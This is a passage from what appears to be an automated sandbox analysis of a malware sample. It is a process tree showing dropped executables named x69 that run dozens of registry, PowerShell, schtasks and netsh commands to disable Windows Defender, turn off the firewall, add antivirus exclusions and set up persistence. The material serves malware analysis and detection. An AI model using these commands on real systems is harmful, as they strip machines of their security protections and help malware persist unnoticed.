                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                  5⤵
                                                                                                    PID:3324
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:1236
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:5640
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:2244
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:4484
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:2720
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                      PID:2292
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                        PID:3368
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                        5⤵
                                                                                                          PID:5132
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                          5⤵
                                                                                                            PID:3064
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                            5⤵
                                                                                                              PID:3708
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                              5⤵
                                                                                                                PID:4504
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                5⤵
                                                                                                                  PID:2900
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                  5⤵
                                                                                                                    PID:940
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                    5⤵
                                                                                                                      PID:2916
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                      5⤵
                                                                                                                        PID:3808
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                        5⤵
                                                                                                                          PID:5148
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                          5⤵
                                                                                                                            PID:4972
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                            5⤵
                                                                                                                              PID:752
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                              5⤵
                                                                                                                                PID:3104
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                5⤵
                                                                                                                                  PID:5912
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:1384
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:2016
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:1084
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:4876
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:3852
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies security service
                                                                                                                                    PID:516
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
                                                                                                                                3⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4484
                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
                                                                                                                                3⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:3428
                                                                                                                              • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\x69install.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:2916
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  4⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:4648
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6dc706d6.bat" "
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:4484
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      6⤵
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:1668
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:684
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:1956
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:4600
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3244
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:228
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4604
                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:5556
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1368
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:2236
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    4⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2516
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7b925020.bat" "
                                                                                                                                      5⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4392
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8D4C.tmp\8D4D.tmp\8D4E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:4980
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2116
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1404
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3672
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6096
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3068
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1220
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5024
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3100
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1048
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2256
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3156
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6088
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6112
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5792
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5724
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1628
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                        6⤵
                                                                                                                                          PID:4888
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                        5⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1460
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                          6⤵
                                                                                                                                            PID:1928
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:556
                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:3412
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                          PID:428
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                          PID:3316
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:2980
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                                            5⤵
                                                                                                                                              PID:4492
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:3260
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:2684
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:4744
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:1588
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:440
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                                PID:996
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                5⤵
                                                                                                                                                  PID:2712
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4772
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                    5⤵
                                                                                                                                                      PID:948
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                      5⤵
                                                                                                                                                        PID:1696
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4084
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                          5⤵
                                                                                                                                                            PID:2080
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                            5⤵
                                                                                                                                                              PID:3196
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4864
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1404
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5388
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2040
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:1344
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4612
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:4888
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:3308
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:2864
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:1148
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:6136
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Security services
                                                                                                                                                                              PID:1140
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies security service
                                                                                                                                                                              PID:3596
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:4492
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:5056
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
